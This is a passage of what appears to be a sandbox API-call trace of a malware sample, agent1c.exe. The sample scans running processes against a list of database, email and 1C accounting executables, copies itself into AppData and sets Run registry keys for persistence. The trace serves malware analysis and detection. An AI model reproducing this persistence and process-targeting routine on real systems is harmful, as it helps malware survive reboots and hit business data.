(lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.968] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.968] lstrlenW (lpString="svchost.exe") returned 11 [0260.968] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.968] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.968] lstrlenW (lpString="svchost.exe") returned 11 [0260.968] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.968] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.969] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0260.969] lstrlenW (lpString="audiodg.exe") returned 11 [0260.969] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0260.969] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0260.969] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0260.969] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0260.969] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0260.969] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0260.969] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0260.969] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.969] lstrlenW (lpString="svchost.exe") returned 11 [0260.969] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.969] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.969] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.969] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.969] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.969] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.969] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.969] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0260.970] lstrlenW (lpString="userinit.exe") returned 12 [0260.970] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0260.970] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0260.970] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0260.970] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0260.970] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0260.970] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0260.970] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0260.970] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.970] lstrlenW (lpString="explorer.exe") returned 12 [0260.970] lstrcmpiW (lpString1="1c8.exe", lpString2="explorer.exe") returned -1 [0260.970] lstrcmpiW (lpString1="1cv77.exe", lpString2="explorer.exe") returned -1 [0260.970] lstrcmpiW (lpString1="outlook.exe", lpString2="explorer.exe") returned 1 [0260.970] lstrcmpiW (lpString1="postgres.exe", lpString2="explorer.exe") returned 1 [0260.970] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="explorer.exe") returned 1 [0260.970] lstrcmpiW (lpString1="mysqld.exe", lpString2="explorer.exe") returned 1 [0260.970] lstrcmpiW (lpString1="sqlservr.exe", lpString2="explorer.exe") returned 1 [0260.970] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0260.971] lstrlenW (lpString="dwm.exe") returned 7 [0260.971] lstrcmpiW (lpString1="1c8.exe", lpString2="dwm.exe") returned -1 [0260.971] lstrcmpiW (lpString1="1cv77.exe", lpString2="dwm.exe") returned -1 [0260.971] lstrcmpiW (lpString1="outlook.exe", lpString2="dwm.exe") returned 1 [0260.971] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.971] lstrlenW (lpString="svchost.exe") returned 11 [0260.971] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0260.972] lstrlenW (lpString="agent1c.exe") returned 11 [0260.972] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0260.972] lstrlenW (lpString="spoolsv.exe") returned 11 [0260.972] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0260.972] lstrlenW (lpString="reader_sl.exe") returned 13 [0260.972] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="AdobeARM.exe")) returned 1 [0260.972] lstrlenW (lpString="AdobeARM.exe") returned 12 [0260.973] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0260.973] lstrlenW (lpString="dllhost.exe") returned 11 [0260.973] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0260.973] CloseHandle (hObject=0xe0) returned 1 [0260.973] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9520 | out: hHeap=0x4a0000) returned 1 [0260.973] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9568 | out: hHeap=0x4a0000) returned 1 [0260.973] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d95b0 | out: hHeap=0x4a0000) returned 1 [0260.973] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d95d0 | out: hHeap=0x4a0000) returned 1 [0260.973] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9618 | out: hHeap=0x4a0000) returned 1 [0260.973] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d4d48 | out: hHeap=0x4a0000) returned 1 [0260.973] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9480 | out: hHeap=0x4a0000) returned 1 [0260.973] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d94b8 | out: hHeap=0x4a0000) returned 1 [0260.973] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b45f0 | out: hHeap=0x4a0000) returned 1 [0260.973] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4618 | out: hHeap=0x4a0000) returned 1 [0260.973] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9500 | out: hHeap=0x4a0000) returned 1 [0260.973] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4640 | out: hHeap=0x4a0000) returned 1 [0260.973] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x4dee58 [0260.974] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x4eee60 [0260.974] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0260.974] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4b4640 [0260.974] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4640, Size=0x40) returned 0x4dabf8 [0260.974] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0260.974] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4b4640 [0260.974] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0260.974] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4b4618 [0260.974] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0260.974] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4b45f0 [0260.974] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b45f0, Size=0x40) returned 0x4dac40 [0260.974] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4eee60, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe")) returned 0x67 [0260.974] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x4fee68 [0260.975] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x50ee70 [0260.975] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0260.975] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4b45f0 [0260.975] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b45f0, Size=0x40) returned 0x4dac88 [0260.975] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dac88, Size=0x80) returned 0x4d9500 [0260.975] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9500, Size=0x100) returned 0x4dbe10 [0260.975] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0260.975] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dbe10 | out: hHeap=0x4a0000) returned 1 [0260.975] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\agent1c.exe", lpDst=0x4fee68, nSize=0x7fff | out: lpDst="C:\\Windows\\System32\\agent1c.exe") returned 0x20 [0260.975] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50ee70 | out: hHeap=0x4a0000) returned 1 [0260.975] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fee68 | out: hHeap=0x4a0000) returned 1 [0260.975] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100000) returned 0x1ff0020 [0260.975] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0260.975] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4b45f0 [0260.975] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0260.975] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4d9bc0 [0260.976] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0260.976] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0260.976] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x0) returned 1 [0260.976] lstrlenW (lpString="kernel32.dll") returned 12 [0260.976] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b45f0 | out: hHeap=0x4a0000) returned 1 [0260.976] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0260.976] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9bc0 | out: hHeap=0x4a0000) returned 1 [0260.976] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0260.976] CreateFileW (lpFileName="C:\\Windows\\System32\\agent1c.exe" (normalized: "c:\\windows\\system32\\agent1c.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0260.985] CloseHandle (hObject=0xe0) returned 1 [0260.985] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0260.985] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4d9bc0 [0260.985] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0260.985] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4d9b70 [0260.985] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0260.986] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0260.986] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0260.986] lstrlenW (lpString="kernel32.dll") returned 12 [0260.986] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9b70 | out: hHeap=0x4a0000) returned 1 [0260.986] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0260.986] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9bc0 | out: hHeap=0x4a0000) returned 1 [0260.986] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1ff0020 | out: hHeap=0x4a0000) returned 1 [0260.986] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x4fee68 [0260.986] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x50ee70 [0260.986] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0260.986] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4d9bc0 [0260.986] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9bc0, Size=0x40) returned 0x4dac88 [0260.986] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dac88, Size=0x80) returned 0x51ee90 [0260.986] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51ee90, Size=0x100) returned 0x4dbe10 [0260.986] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0260.986] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dbe10 | out: hHeap=0x4a0000) returned 1 [0260.986] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\agent1c.exe", lpDst=0x4fee68, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\agent1c.exe") returned 0x3a [0260.986] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50ee70 | out: hHeap=0x4a0000) returned 1 [0260.986] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fee68 | out: hHeap=0x4a0000) returned 1 [0260.986] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100000) returned 0x1ff0020 [0260.987] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0260.987] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4d9bc0 [0260.987] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0260.987] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4d9b70 [0260.987] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0260.987] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0260.987] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0260.987] lstrlenW (lpString="kernel32.dll") returned 12 [0260.987] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9bc0 | out: hHeap=0x4a0000) returned 1 [0260.987] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0260.987] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9b70 | out: hHeap=0x4a0000) returned 1 [0260.987] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0260.987] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\agent1c.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0260.989] ReadFile (in: hFile=0xe0, lpBuffer=0x1ff0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x1ff0020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0261.007] WriteFile (in: hFile=0xe4, lpBuffer=0x1ff0020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x1ff0020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0261.010] ReadFile (in: hFile=0xe0, lpBuffer=0x1ff0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x1ff0020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0261.010] CloseHandle (hObject=0xe4) returned 1 [0261.010] CloseHandle (hObject=0xe0) returned 1 [0261.010] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0261.010] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4d9b70 [0261.010] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0261.010] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4d9bc0 [0261.011] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0261.011] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0261.011] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0261.011] lstrlenW (lpString="kernel32.dll") returned 12 [0261.011] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9bc0 | out: hHeap=0x4a0000) returned 1 [0261.011] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0261.011] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9b70 | out: hHeap=0x4a0000) returned 1 [0261.011] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1ff0020 | out: hHeap=0x4a0000) returned 1 [0261.017] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0261.017] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d48, Size=0x20) returned 0x4d9b70 [0261.017] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9b70, Size=0x40) returned 0x4dac88 [0261.017] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dac88, Size=0x80) returned 0x51ee90 [0261.017] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\agent1c.exe") returned 57 [0261.017] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0261.017] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x5c) returned 0x4dc0f8 [0261.017] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18fd6c | out: phkResult=0x18fd6c*=0xe0) returned 0x0 [0261.017] RegSetValueExW (hKey=0xe0, lpValueName="agent1c.exe", Reserved=0x0, dwType=0x1, lpData=0x4dee58, cbData=0x72) returned 0x5 [0261.017] RegCloseKey (hKey=0xe0) returned 0x0 [0261.017] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dc0f8 | out: hHeap=0x4a0000) returned 1 [0261.017] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\agent1c.exe") returned 57 [0261.017] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0261.017] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x5c) returned 0x4dc0f8 [0261.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18fd6c | out: phkResult=0x18fd6c*=0xe4) returned 0x0 [0261.017] RegSetValueExW (in: hKey=0xe4, lpValueName="agent1c.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\agent1c.exe", cbData=0x72 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\agent1c.exe") returned 0x0 [0261.018] RegCloseKey (hKey=0xe4) returned 0x0 [0261.018] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dc0f8 | out: hHeap=0x4a0000) returned 1 [0261.018] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0261.018] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x51ee90 | out: hHeap=0x4a0000) returned 1 [0261.018] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x4fee68 [0261.018] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x50ee70 [0261.018] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d78 [0261.018] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d78, Size=0x20) returned 0x4d9b70 [0261.018] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9b70, Size=0x40) returned 0x4dac88 [0261.018] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dac88, Size=0x80) returned 0x51ee90 [0261.018] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51ee90, Size=0x100) returned 0x4dbe10 [0261.018] lstrlenW (lpString="") returned 0 [0261.018] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0261.018] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8c) returned 0x4dbf18 [0261.018] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0261.018] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x50ee70, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x0, lpData=0x50ee70*=0x53, lpcbData=0x18fd50*=0x7fff) returned 0x2 